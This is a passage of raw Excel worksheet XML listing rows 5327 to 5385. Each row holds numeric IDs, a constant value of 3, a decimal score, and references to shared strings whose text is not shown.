        <v>3</v>
      </c>
      <c r="E5327">
        <v>0.52960002422332764</v>
      </c>
      <c r="F5327" t="s">
        <v>10120</v>
      </c>
      <c r="G5327" t="s">
        <v>10533</v>
      </c>
      <c r="H5327" t="s">
        <v>10534</v>
      </c>
    </row>
    <row r="5328" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5328" s="1">
        <v>5326</v>
      </c>
      <c r="B5328">
        <v>6707</v>
      </c>
      <c r="C5328">
        <v>6707</v>
      </c>
      <c r="D5328">
        <v>3</v>
      </c>
      <c r="E5328">
        <v>0.69120001792907715</v>
      </c>
      <c r="F5328" t="s">
        <v>10120</v>
      </c>
      <c r="G5328" t="s">
        <v>10535</v>
      </c>
      <c r="H5328" t="s">
        <v>10536</v>
      </c>
    </row>
    <row r="5329" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5329" s="1">
        <v>5327</v>
      </c>
      <c r="B5329">
        <v>7299</v>
      </c>
      <c r="C5329">
        <v>7299</v>
      </c>
      <c r="D5329">
        <v>3</v>
      </c>
      <c r="E5329">
        <v>0.9976000189781189</v>
      </c>
      <c r="F5329" t="s">
        <v>10120</v>
      </c>
      <c r="G5329" t="s">
        <v>10537</v>
      </c>
      <c r="H5329" t="s">
        <v>10538</v>
      </c>
    </row>
    <row r="5330" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5330" s="1">
        <v>5328</v>
      </c>
      <c r="B5330">
        <v>6708</v>
      </c>
      <c r="C5330">
        <v>6708</v>
      </c>
      <c r="D5330">
        <v>3</v>
      </c>
      <c r="E5330">
        <v>0.5285000205039978</v>
      </c>
      <c r="F5330" t="s">
        <v>10120</v>
      </c>
      <c r="G5330" t="s">
        <v>10539</v>
      </c>
      <c r="H5330" t="s">
        <v>10540</v>
      </c>
    </row>
    <row r="5331" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5331" s="1">
        <v>5329</v>
      </c>
      <c r="B5331">
        <v>7430</v>
      </c>
      <c r="C5331">
        <v>7430</v>
      </c>
      <c r="D5331">
        <v>3</v>
      </c>
      <c r="E5331">
        <v>0.65420001745223999</v>
      </c>
      <c r="F5331" t="s">
        <v>10120</v>
      </c>
      <c r="G5331" t="s">
        <v>10541</v>
      </c>
      <c r="H5331" t="s">
        <v>10542</v>
      </c>
    </row>
    <row r="5332" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5332" s="1">
        <v>5330</v>
      </c>
      <c r="B5332">
        <v>7303</v>
      </c>
      <c r="C5332">
        <v>7303</v>
      </c>
      <c r="D5332">
        <v>3</v>
      </c>
      <c r="E5332">
        <v>0.76649999618530273</v>
      </c>
      <c r="F5332" t="s">
        <v>10120</v>
      </c>
      <c r="G5332" t="s">
        <v>10543</v>
      </c>
      <c r="H5332" t="s">
        <v>10544</v>
      </c>
    </row>
    <row r="5333" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5333" s="1">
        <v>5331</v>
      </c>
      <c r="B5333">
        <v>5813</v>
      </c>
      <c r="C5333">
        <v>5813</v>
      </c>
      <c r="D5333">
        <v>3</v>
      </c>
      <c r="E5333">
        <v>0.95509999990463257</v>
      </c>
      <c r="F5333" t="s">
        <v>10120</v>
      </c>
      <c r="G5333" t="s">
        <v>10545</v>
      </c>
      <c r="H5333" t="s">
        <v>10546</v>
      </c>
    </row>
    <row r="5334" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5334" s="1">
        <v>5332</v>
      </c>
      <c r="B5334">
        <v>6189</v>
      </c>
      <c r="C5334">
        <v>6189</v>
      </c>
      <c r="D5334">
        <v>3</v>
      </c>
      <c r="E5334">
        <v>0.99150002002716064</v>
      </c>
      <c r="F5334" t="s">
        <v>10120</v>
      </c>
      <c r="G5334" t="s">
        <v>10547</v>
      </c>
      <c r="H5334" t="s">
        <v>10548</v>
      </c>
    </row>
    <row r="5335" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5335" s="1">
        <v>5333</v>
      </c>
      <c r="B5335">
        <v>6710</v>
      </c>
      <c r="C5335">
        <v>6710</v>
      </c>
      <c r="D5335">
        <v>3</v>
      </c>
      <c r="E5335">
        <v>0.67189997434616089</v>
      </c>
      <c r="F5335" t="s">
        <v>10120</v>
      </c>
      <c r="G5335" t="s">
        <v>10549</v>
      </c>
      <c r="H5335" t="s">
        <v>10550</v>
      </c>
    </row>
    <row r="5336" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5336" s="1">
        <v>5334</v>
      </c>
      <c r="B5336">
        <v>7306</v>
      </c>
      <c r="C5336">
        <v>7306</v>
      </c>
      <c r="D5336">
        <v>3</v>
      </c>
      <c r="E5336">
        <v>0.59829998016357422</v>
      </c>
      <c r="F5336" t="s">
        <v>10120</v>
      </c>
      <c r="G5336" t="s">
        <v>10551</v>
      </c>
      <c r="H5336" t="s">
        <v>10552</v>
      </c>
    </row>
    <row r="5337" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5337" s="1">
        <v>5335</v>
      </c>
      <c r="B5337">
        <v>5880</v>
      </c>
      <c r="C5337">
        <v>5880</v>
      </c>
      <c r="D5337">
        <v>3</v>
      </c>
      <c r="E5337">
        <v>0.83160001039505005</v>
      </c>
      <c r="F5337" t="s">
        <v>10120</v>
      </c>
      <c r="G5337" t="s">
        <v>10553</v>
      </c>
      <c r="H5337" t="s">
        <v>10554</v>
      </c>
    </row>
    <row r="5338" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5338" s="1">
        <v>5336</v>
      </c>
      <c r="B5338">
        <v>6785</v>
      </c>
      <c r="C5338">
        <v>6785</v>
      </c>
      <c r="D5338">
        <v>3</v>
      </c>
      <c r="E5338">
        <v>0.9934999942779541</v>
      </c>
      <c r="F5338" t="s">
        <v>10120</v>
      </c>
      <c r="G5338" t="s">
        <v>10555</v>
      </c>
      <c r="H5338" t="s">
        <v>10556</v>
      </c>
    </row>
    <row r="5339" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5339" s="1">
        <v>5337</v>
      </c>
      <c r="B5339">
        <v>7307</v>
      </c>
      <c r="C5339">
        <v>7307</v>
      </c>
      <c r="D5339">
        <v>3</v>
      </c>
      <c r="E5339">
        <v>0.99409997463226318</v>
      </c>
      <c r="F5339" t="s">
        <v>10120</v>
      </c>
      <c r="G5339" t="s">
        <v>10557</v>
      </c>
      <c r="H5339" t="s">
        <v>10558</v>
      </c>
    </row>
    <row r="5340" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5340" s="1">
        <v>5338</v>
      </c>
      <c r="B5340">
        <v>7476</v>
      </c>
      <c r="C5340">
        <v>7476</v>
      </c>
      <c r="D5340">
        <v>3</v>
      </c>
      <c r="E5340">
        <v>0.99199998378753662</v>
      </c>
      <c r="F5340" t="s">
        <v>10120</v>
      </c>
      <c r="G5340" t="s">
        <v>10559</v>
      </c>
      <c r="H5340" t="s">
        <v>10560</v>
      </c>
    </row>
    <row r="5341" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5341" s="1">
        <v>5339</v>
      </c>
      <c r="B5341">
        <v>7479</v>
      </c>
      <c r="C5341">
        <v>7479</v>
      </c>
      <c r="D5341">
        <v>3</v>
      </c>
      <c r="E5341">
        <v>0.94160002470016479</v>
      </c>
      <c r="F5341" t="s">
        <v>10120</v>
      </c>
      <c r="G5341" t="s">
        <v>10561</v>
      </c>
      <c r="H5341" t="s">
        <v>10562</v>
      </c>
    </row>
    <row r="5342" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5342" s="1">
        <v>5340</v>
      </c>
      <c r="B5342">
        <v>6666</v>
      </c>
      <c r="C5342">
        <v>6666</v>
      </c>
      <c r="D5342">
        <v>3</v>
      </c>
      <c r="E5342">
        <v>0.86510002613067627</v>
      </c>
      <c r="F5342" t="s">
        <v>10120</v>
      </c>
      <c r="G5342" t="s">
        <v>10563</v>
      </c>
      <c r="H5342" t="s">
        <v>10564</v>
      </c>
    </row>
    <row r="5343" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5343" s="1">
        <v>5341</v>
      </c>
      <c r="B5343">
        <v>7502</v>
      </c>
      <c r="C5343">
        <v>7502</v>
      </c>
      <c r="D5343">
        <v>3</v>
      </c>
      <c r="E5343">
        <v>0.99550002813339233</v>
      </c>
      <c r="F5343" t="s">
        <v>10120</v>
      </c>
      <c r="G5343" t="s">
        <v>10565</v>
      </c>
      <c r="H5343" t="s">
        <v>10566</v>
      </c>
    </row>
    <row r="5344" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5344" s="1">
        <v>5342</v>
      </c>
      <c r="B5344">
        <v>6668</v>
      </c>
      <c r="C5344">
        <v>6668</v>
      </c>
      <c r="D5344">
        <v>3</v>
      </c>
      <c r="E5344">
        <v>0.99409997463226318</v>
      </c>
      <c r="F5344" t="s">
        <v>10120</v>
      </c>
      <c r="G5344" t="s">
        <v>10567</v>
      </c>
      <c r="H5344" t="s">
        <v>10568</v>
      </c>
    </row>
    <row r="5345" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5345" s="1">
        <v>5343</v>
      </c>
      <c r="B5345">
        <v>6232</v>
      </c>
      <c r="C5345">
        <v>6232</v>
      </c>
      <c r="D5345">
        <v>3</v>
      </c>
      <c r="E5345">
        <v>0.96079999208450317</v>
      </c>
      <c r="F5345" t="s">
        <v>10120</v>
      </c>
      <c r="G5345" t="s">
        <v>10569</v>
      </c>
      <c r="H5345" t="s">
        <v>10570</v>
      </c>
    </row>
    <row r="5346" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5346" s="1">
        <v>5344</v>
      </c>
      <c r="B5346">
        <v>6669</v>
      </c>
      <c r="C5346">
        <v>6669</v>
      </c>
      <c r="D5346">
        <v>3</v>
      </c>
      <c r="E5346">
        <v>0.98799997568130493</v>
      </c>
      <c r="F5346" t="s">
        <v>10120</v>
      </c>
      <c r="G5346" t="s">
        <v>10571</v>
      </c>
      <c r="H5346" t="s">
        <v>10572</v>
      </c>
    </row>
    <row r="5347" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5347" s="1">
        <v>5345</v>
      </c>
      <c r="B5347">
        <v>6671</v>
      </c>
      <c r="C5347">
        <v>6671</v>
      </c>
      <c r="D5347">
        <v>3</v>
      </c>
      <c r="E5347">
        <v>0.9812999963760376</v>
      </c>
      <c r="F5347" t="s">
        <v>10120</v>
      </c>
      <c r="G5347" t="s">
        <v>10573</v>
      </c>
      <c r="H5347" t="s">
        <v>10574</v>
      </c>
    </row>
    <row r="5348" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5348" s="1">
        <v>5346</v>
      </c>
      <c r="B5348">
        <v>6672</v>
      </c>
      <c r="C5348">
        <v>6672</v>
      </c>
      <c r="D5348">
        <v>3</v>
      </c>
      <c r="E5348">
        <v>0.99610000848770142</v>
      </c>
      <c r="F5348" t="s">
        <v>10120</v>
      </c>
      <c r="G5348" t="s">
        <v>10575</v>
      </c>
      <c r="H5348" t="s">
        <v>10576</v>
      </c>
    </row>
    <row r="5349" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5349" s="1">
        <v>5347</v>
      </c>
      <c r="B5349">
        <v>6673</v>
      </c>
      <c r="C5349">
        <v>6673</v>
      </c>
      <c r="D5349">
        <v>3</v>
      </c>
      <c r="E5349">
        <v>0.98739999532699585</v>
      </c>
      <c r="F5349" t="s">
        <v>10120</v>
      </c>
      <c r="G5349" t="s">
        <v>10577</v>
      </c>
      <c r="H5349" t="s">
        <v>10578</v>
      </c>
    </row>
    <row r="5350" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5350" s="1">
        <v>5348</v>
      </c>
      <c r="B5350">
        <v>6674</v>
      </c>
      <c r="C5350">
        <v>6674</v>
      </c>
      <c r="D5350">
        <v>3</v>
      </c>
      <c r="E5350">
        <v>0.99739998579025269</v>
      </c>
      <c r="F5350" t="s">
        <v>10120</v>
      </c>
      <c r="G5350" t="s">
        <v>10579</v>
      </c>
      <c r="H5350" t="s">
        <v>10580</v>
      </c>
    </row>
    <row r="5351" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5351" s="1">
        <v>5349</v>
      </c>
      <c r="B5351">
        <v>7498</v>
      </c>
      <c r="C5351">
        <v>7498</v>
      </c>
      <c r="D5351">
        <v>3</v>
      </c>
      <c r="E5351">
        <v>0.66479998826980591</v>
      </c>
      <c r="F5351" t="s">
        <v>10120</v>
      </c>
      <c r="G5351" t="s">
        <v>10581</v>
      </c>
      <c r="H5351" t="s">
        <v>10582</v>
      </c>
    </row>
    <row r="5352" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5352" s="1">
        <v>5350</v>
      </c>
      <c r="B5352">
        <v>5795</v>
      </c>
      <c r="C5352">
        <v>5795</v>
      </c>
      <c r="D5352">
        <v>3</v>
      </c>
      <c r="E5352">
        <v>0.74000000953674316</v>
      </c>
      <c r="F5352" t="s">
        <v>10120</v>
      </c>
      <c r="G5352" t="s">
        <v>10583</v>
      </c>
      <c r="H5352" t="s">
        <v>10584</v>
      </c>
    </row>
    <row r="5353" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5353" s="1">
        <v>5351</v>
      </c>
      <c r="B5353">
        <v>6675</v>
      </c>
      <c r="C5353">
        <v>6675</v>
      </c>
      <c r="D5353">
        <v>3</v>
      </c>
      <c r="E5353">
        <v>0.98339998722076416</v>
      </c>
      <c r="F5353" t="s">
        <v>10120</v>
      </c>
      <c r="G5353" t="s">
        <v>10585</v>
      </c>
      <c r="H5353" t="s">
        <v>10586</v>
      </c>
    </row>
    <row r="5354" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5354" s="1">
        <v>5352</v>
      </c>
      <c r="B5354">
        <v>6676</v>
      </c>
      <c r="C5354">
        <v>6676</v>
      </c>
      <c r="D5354">
        <v>3</v>
      </c>
      <c r="E5354">
        <v>0.61879998445510864</v>
      </c>
      <c r="F5354" t="s">
        <v>10120</v>
      </c>
      <c r="G5354" t="s">
        <v>10587</v>
      </c>
      <c r="H5354" t="s">
        <v>10588</v>
      </c>
    </row>
    <row r="5355" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5355" s="1">
        <v>5353</v>
      </c>
      <c r="B5355">
        <v>6677</v>
      </c>
      <c r="C5355">
        <v>6677</v>
      </c>
      <c r="D5355">
        <v>3</v>
      </c>
      <c r="E5355">
        <v>0.83869999647140503</v>
      </c>
      <c r="F5355" t="s">
        <v>10120</v>
      </c>
      <c r="G5355" t="s">
        <v>10589</v>
      </c>
      <c r="H5355" t="s">
        <v>10590</v>
      </c>
    </row>
    <row r="5356" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5356" s="1">
        <v>5354</v>
      </c>
      <c r="B5356">
        <v>7478</v>
      </c>
      <c r="C5356">
        <v>7478</v>
      </c>
      <c r="D5356">
        <v>3</v>
      </c>
      <c r="E5356">
        <v>0.72630000114440918</v>
      </c>
      <c r="F5356" t="s">
        <v>10120</v>
      </c>
      <c r="G5356" t="s">
        <v>10591</v>
      </c>
      <c r="H5356" t="s">
        <v>10592</v>
      </c>
    </row>
    <row r="5357" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5357" s="1">
        <v>5355</v>
      </c>
      <c r="B5357">
        <v>7496</v>
      </c>
      <c r="C5357">
        <v>7496</v>
      </c>
      <c r="D5357">
        <v>3</v>
      </c>
      <c r="E5357">
        <v>0.81859999895095825</v>
      </c>
      <c r="F5357" t="s">
        <v>10120</v>
      </c>
      <c r="G5357" t="s">
        <v>10593</v>
      </c>
      <c r="H5357" t="s">
        <v>10594</v>
      </c>
    </row>
    <row r="5358" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5358" s="1">
        <v>5356</v>
      </c>
      <c r="B5358">
        <v>6679</v>
      </c>
      <c r="C5358">
        <v>6679</v>
      </c>
      <c r="D5358">
        <v>3</v>
      </c>
      <c r="E5358">
        <v>0.78579998016357422</v>
      </c>
      <c r="F5358" t="s">
        <v>10120</v>
      </c>
      <c r="G5358" t="s">
        <v>10595</v>
      </c>
      <c r="H5358" t="s">
        <v>10596</v>
      </c>
    </row>
    <row r="5359" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5359" s="1">
        <v>5357</v>
      </c>
      <c r="B5359">
        <v>5798</v>
      </c>
      <c r="C5359">
        <v>5798</v>
      </c>
      <c r="D5359">
        <v>3</v>
      </c>
      <c r="E5359">
        <v>0.5503000020980835</v>
      </c>
      <c r="F5359" t="s">
        <v>10120</v>
      </c>
      <c r="G5359" t="s">
        <v>10597</v>
      </c>
      <c r="H5359" t="s">
        <v>10598</v>
      </c>
    </row>
    <row r="5360" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5360" s="1">
        <v>5358</v>
      </c>
      <c r="B5360">
        <v>6804</v>
      </c>
      <c r="C5360">
        <v>6804</v>
      </c>
      <c r="D5360">
        <v>3</v>
      </c>
      <c r="E5360">
        <v>0.99709999561309814</v>
      </c>
      <c r="F5360" t="s">
        <v>10120</v>
      </c>
      <c r="G5360" t="s">
        <v>10599</v>
      </c>
      <c r="H5360" t="s">
        <v>10600</v>
      </c>
    </row>
    <row r="5361" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5361" s="1">
        <v>5359</v>
      </c>
      <c r="B5361">
        <v>6134</v>
      </c>
      <c r="C5361">
        <v>6134</v>
      </c>
      <c r="D5361">
        <v>3</v>
      </c>
      <c r="E5361">
        <v>0.59450000524520874</v>
      </c>
      <c r="F5361" t="s">
        <v>10120</v>
      </c>
      <c r="G5361" t="s">
        <v>10601</v>
      </c>
      <c r="H5361" t="s">
        <v>10602</v>
      </c>
    </row>
    <row r="5362" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5362" s="1">
        <v>5360</v>
      </c>
      <c r="B5362">
        <v>6216</v>
      </c>
      <c r="C5362">
        <v>6216</v>
      </c>
      <c r="D5362">
        <v>3</v>
      </c>
      <c r="E5362">
        <v>0.59030002355575562</v>
      </c>
      <c r="F5362" t="s">
        <v>10120</v>
      </c>
      <c r="G5362" t="s">
        <v>10603</v>
      </c>
      <c r="H5362" t="s">
        <v>10604</v>
      </c>
    </row>
    <row r="5363" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5363" s="1">
        <v>5361</v>
      </c>
      <c r="B5363">
        <v>6680</v>
      </c>
      <c r="C5363">
        <v>6680</v>
      </c>
      <c r="D5363">
        <v>3</v>
      </c>
      <c r="E5363">
        <v>0.99190002679824829</v>
      </c>
      <c r="F5363" t="s">
        <v>10120</v>
      </c>
      <c r="G5363" t="s">
        <v>10605</v>
      </c>
      <c r="H5363" t="s">
        <v>10606</v>
      </c>
    </row>
    <row r="5364" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5364" s="1">
        <v>5362</v>
      </c>
      <c r="B5364">
        <v>6795</v>
      </c>
      <c r="C5364">
        <v>6795</v>
      </c>
      <c r="D5364">
        <v>3</v>
      </c>
      <c r="E5364">
        <v>0.60989999771118164</v>
      </c>
      <c r="F5364" t="s">
        <v>10120</v>
      </c>
      <c r="G5364" t="s">
        <v>10607</v>
      </c>
      <c r="H5364" t="s">
        <v>10608</v>
      </c>
    </row>
    <row r="5365" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5365" s="1">
        <v>5363</v>
      </c>
      <c r="B5365">
        <v>6136</v>
      </c>
      <c r="C5365">
        <v>6136</v>
      </c>
      <c r="D5365">
        <v>3</v>
      </c>
      <c r="E5365">
        <v>0.98339998722076416</v>
      </c>
      <c r="F5365" t="s">
        <v>10120</v>
      </c>
      <c r="G5365" t="s">
        <v>10609</v>
      </c>
      <c r="H5365" t="s">
        <v>10610</v>
      </c>
    </row>
    <row r="5366" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5366" s="1">
        <v>5364</v>
      </c>
      <c r="B5366">
        <v>6681</v>
      </c>
      <c r="C5366">
        <v>6681</v>
      </c>
      <c r="D5366">
        <v>3</v>
      </c>
      <c r="E5366">
        <v>0.96390002965927124</v>
      </c>
      <c r="F5366" t="s">
        <v>10120</v>
      </c>
      <c r="G5366" t="s">
        <v>10611</v>
      </c>
      <c r="H5366" t="s">
        <v>10612</v>
      </c>
    </row>
    <row r="5367" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5367" s="1">
        <v>5365</v>
      </c>
      <c r="B5367">
        <v>6682</v>
      </c>
      <c r="C5367">
        <v>6682</v>
      </c>
      <c r="D5367">
        <v>3</v>
      </c>
      <c r="E5367">
        <v>0.99739998579025269</v>
      </c>
      <c r="F5367" t="s">
        <v>10120</v>
      </c>
      <c r="G5367" t="s">
        <v>10613</v>
      </c>
      <c r="H5367" t="s">
        <v>10580</v>
      </c>
    </row>
    <row r="5368" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5368" s="1">
        <v>5366</v>
      </c>
      <c r="B5368">
        <v>6137</v>
      </c>
      <c r="C5368">
        <v>6137</v>
      </c>
      <c r="D5368">
        <v>3</v>
      </c>
      <c r="E5368">
        <v>0.9966999888420105</v>
      </c>
      <c r="F5368" t="s">
        <v>10120</v>
      </c>
      <c r="G5368" t="s">
        <v>10614</v>
      </c>
      <c r="H5368" t="s">
        <v>10615</v>
      </c>
    </row>
    <row r="5369" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5369" s="1">
        <v>5367</v>
      </c>
      <c r="B5369">
        <v>5799</v>
      </c>
      <c r="C5369">
        <v>5799</v>
      </c>
      <c r="D5369">
        <v>3</v>
      </c>
      <c r="E5369">
        <v>0.98739999532699585</v>
      </c>
      <c r="F5369" t="s">
        <v>10120</v>
      </c>
      <c r="G5369" t="s">
        <v>10616</v>
      </c>
      <c r="H5369" t="s">
        <v>10617</v>
      </c>
    </row>
    <row r="5370" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5370" s="1">
        <v>5368</v>
      </c>
      <c r="B5370">
        <v>6138</v>
      </c>
      <c r="C5370">
        <v>6138</v>
      </c>
      <c r="D5370">
        <v>3</v>
      </c>
      <c r="E5370">
        <v>0.52020001411437988</v>
      </c>
      <c r="F5370" t="s">
        <v>10120</v>
      </c>
      <c r="G5370" t="s">
        <v>10618</v>
      </c>
      <c r="H5370" t="s">
        <v>10619</v>
      </c>
    </row>
    <row r="5371" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5371" s="1">
        <v>5369</v>
      </c>
      <c r="B5371">
        <v>7483</v>
      </c>
      <c r="C5371">
        <v>7483</v>
      </c>
      <c r="D5371">
        <v>3</v>
      </c>
      <c r="E5371">
        <v>0.57929998636245728</v>
      </c>
      <c r="F5371" t="s">
        <v>10120</v>
      </c>
      <c r="G5371" t="s">
        <v>10620</v>
      </c>
      <c r="H5371" t="s">
        <v>10621</v>
      </c>
    </row>
    <row r="5372" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5372" s="1">
        <v>5370</v>
      </c>
      <c r="B5372">
        <v>6678</v>
      </c>
      <c r="C5372">
        <v>6678</v>
      </c>
      <c r="D5372">
        <v>3</v>
      </c>
      <c r="E5372">
        <v>0.99800002574920654</v>
      </c>
      <c r="F5372" t="s">
        <v>10120</v>
      </c>
      <c r="G5372" t="s">
        <v>10622</v>
      </c>
      <c r="H5372" t="s">
        <v>10623</v>
      </c>
    </row>
    <row r="5373" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5373" s="1">
        <v>5371</v>
      </c>
      <c r="B5373">
        <v>6665</v>
      </c>
      <c r="C5373">
        <v>6665</v>
      </c>
      <c r="D5373">
        <v>3</v>
      </c>
      <c r="E5373">
        <v>0.95560002326965332</v>
      </c>
      <c r="F5373" t="s">
        <v>10120</v>
      </c>
      <c r="G5373" t="s">
        <v>10624</v>
      </c>
      <c r="H5373" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="5374" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5374" s="1">
        <v>5372</v>
      </c>
      <c r="B5374">
        <v>7308</v>
      </c>
      <c r="C5374">
        <v>7308</v>
      </c>
      <c r="D5374">
        <v>3</v>
      </c>
      <c r="E5374">
        <v>0.98509997129440308</v>
      </c>
      <c r="F5374" t="s">
        <v>10120</v>
      </c>
      <c r="G5374" t="s">
        <v>10626</v>
      </c>
      <c r="H5374" t="s">
        <v>10627</v>
      </c>
    </row>
    <row r="5375" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5375" s="1">
        <v>5373</v>
      </c>
      <c r="B5375">
        <v>6187</v>
      </c>
      <c r="C5375">
        <v>6187</v>
      </c>
      <c r="D5375">
        <v>3</v>
      </c>
      <c r="E5375">
        <v>0.99870002269744873</v>
      </c>
      <c r="F5375" t="s">
        <v>10120</v>
      </c>
      <c r="G5375" t="s">
        <v>10628</v>
      </c>
      <c r="H5375" t="s">
        <v>10629</v>
      </c>
    </row>
    <row r="5376" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5376" s="1">
        <v>5374</v>
      </c>
      <c r="B5376">
        <v>6741</v>
      </c>
      <c r="C5376">
        <v>6741</v>
      </c>
      <c r="D5376">
        <v>3</v>
      </c>
      <c r="E5376">
        <v>0.66960000991821289</v>
      </c>
      <c r="F5376" t="s">
        <v>10120</v>
      </c>
      <c r="G5376" t="s">
        <v>10630</v>
      </c>
      <c r="H5376" t="s">
        <v>10631</v>
      </c>
    </row>
    <row r="5377" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5377" s="1">
        <v>5375</v>
      </c>
      <c r="B5377">
        <v>5838</v>
      </c>
      <c r="C5377">
        <v>5838</v>
      </c>
      <c r="D5377">
        <v>3</v>
      </c>
      <c r="E5377">
        <v>0.98989999294281006</v>
      </c>
      <c r="F5377" t="s">
        <v>10120</v>
      </c>
      <c r="G5377" t="s">
        <v>10632</v>
      </c>
      <c r="H5377" t="s">
        <v>10633</v>
      </c>
    </row>
    <row r="5378" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5378" s="1">
        <v>5376</v>
      </c>
      <c r="B5378">
        <v>7340</v>
      </c>
      <c r="C5378">
        <v>7340</v>
      </c>
      <c r="D5378">
        <v>3</v>
      </c>
      <c r="E5378">
        <v>0.696399986743927</v>
      </c>
      <c r="F5378" t="s">
        <v>10120</v>
      </c>
      <c r="G5378" t="s">
        <v>10634</v>
      </c>
      <c r="H5378" t="s">
        <v>10635</v>
      </c>
    </row>
    <row r="5379" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5379" s="1">
        <v>5377</v>
      </c>
      <c r="B5379">
        <v>6743</v>
      </c>
      <c r="C5379">
        <v>6743</v>
      </c>
      <c r="D5379">
        <v>3</v>
      </c>
      <c r="E5379">
        <v>0.7378000020980835</v>
      </c>
      <c r="F5379" t="s">
        <v>10120</v>
      </c>
      <c r="G5379" t="s">
        <v>10636</v>
      </c>
      <c r="H5379" t="s">
        <v>10637</v>
      </c>
    </row>
    <row r="5380" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5380" s="1">
        <v>5378</v>
      </c>
      <c r="B5380">
        <v>7370</v>
      </c>
      <c r="C5380">
        <v>7370</v>
      </c>
      <c r="D5380">
        <v>3</v>
      </c>
      <c r="E5380">
        <v>0.63249999284744263</v>
      </c>
      <c r="F5380" t="s">
        <v>10120</v>
      </c>
      <c r="G5380" t="s">
        <v>10638</v>
      </c>
      <c r="H5380" t="s">
        <v>10639</v>
      </c>
    </row>
    <row r="5381" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5381" s="1">
        <v>5379</v>
      </c>
      <c r="B5381">
        <v>7369</v>
      </c>
      <c r="C5381">
        <v>7369</v>
      </c>
      <c r="D5381">
        <v>3</v>
      </c>
      <c r="E5381">
        <v>0.99220001697540283</v>
      </c>
      <c r="F5381" t="s">
        <v>10120</v>
      </c>
      <c r="G5381" t="s">
        <v>10640</v>
      </c>
      <c r="H5381" t="s">
        <v>10641</v>
      </c>
    </row>
    <row r="5382" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5382" s="1">
        <v>5380</v>
      </c>
      <c r="B5382">
        <v>7368</v>
      </c>
      <c r="C5382">
        <v>7368</v>
      </c>
      <c r="D5382">
        <v>3</v>
      </c>
      <c r="E5382">
        <v>0.73900002241134644</v>
      </c>
      <c r="F5382" t="s">
        <v>10120</v>
      </c>
      <c r="G5382" t="s">
        <v>10642</v>
      </c>
      <c r="H5382" t="s">
        <v>10643</v>
      </c>
    </row>
    <row r="5383" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5383" s="1">
        <v>5381</v>
      </c>
      <c r="B5383">
        <v>7367</v>
      </c>
      <c r="C5383">
        <v>7367</v>
      </c>
      <c r="D5383">
        <v>3</v>
      </c>
      <c r="E5383">
        <v>0.99260002374649048</v>
      </c>
      <c r="F5383" t="s">
        <v>10120</v>
      </c>
      <c r="G5383" t="s">
        <v>10644</v>
      </c>
      <c r="H5383" t="s">
        <v>10645</v>
      </c>
    </row>
    <row r="5384" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5384" s="1">
        <v>5382</v>
      </c>
      <c r="B5384">
        <v>7366</v>
      </c>
      <c r="C5384">
        <v>7366</v>
      </c>
      <c r="D5384">
        <v>3</v>
      </c>
      <c r="E5384">
        <v>0.93569999933242798</v>
      </c>
      <c r="F5384" t="s">
        <v>10120</v>
      </c>
      <c r="G5384" t="s">
        <v>10646</v>
      </c>
      <c r="H5384" t="s">
        <v>10647</v>
      </c>
    </row>
    <row r="5385" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5385" s="1">
        <v>5383</v>
      </c>
      <c r="B5385">
        <v>7365</v>
      </c>
      <c r="C5385">
        <v>7365</v>
      </c>
      <c r="D5385">
        <v>3</v>
      </c>
      <c r="E5385">
        <v>0.78640002012252808</v>
      </c>
      <c r="F5385" t="s">
        <v>10120</v>
      </c>
      <c r="G5385" t="s">
